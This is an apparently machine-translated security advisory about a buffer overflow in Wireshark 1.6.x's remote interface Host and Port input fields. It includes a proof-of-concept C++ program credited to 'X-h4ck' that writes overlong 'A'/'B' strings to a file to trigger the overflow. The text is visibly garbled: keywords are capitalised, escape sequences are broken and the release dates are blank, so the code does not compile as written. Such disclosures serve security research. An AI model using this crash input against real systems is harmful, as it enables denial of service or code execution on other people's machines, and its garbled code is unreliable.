Wireshark remote Interface Buffer Overflow Vulnerability

Wireshark remote Interface Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
Wireshark 1.6.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55211

Wireshark (formerly known as Ethereal) is a network group analysis software.

Wireshark 1.6.0, 1.8.2, and other versions have a buffer overflow vulnerability. This vulnerability allows remote attackers to execute arbitrary code in affected applications.

<* Source: X-h4ck
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

X-h4ck () provides the following testing methods:

# Include <cstdio>
# Include <iostream>
// Wrote a little shit code to generate> nicely for u those strings
Using namespace std;
Int main (){

Char buff1 [] = "\ x41 ";
Char buff2 [] = "\ x42 ";
FILE * txtfile;
Txtfile = fopen ("c: \ exploit.txt", "w ");
Fputs ("Host Input: \ n", txtfile );
For (int I = 0; I <659; I ++ ){
Fputs (buff1, txtfile );
}
Fputs ("\ n", txtfile );
Fputs ("Port Input: \ n", txtfile );
For (int y = 0; y <652; y ++ ){
Fputs (buff1, txtfile );
}
For (int x = 0; x <8; x ++ ){
Fputs (buff2, txtfile );
}
Fclose (txtfile );
Return 0;
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Wireshark
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.wireshark.org/security/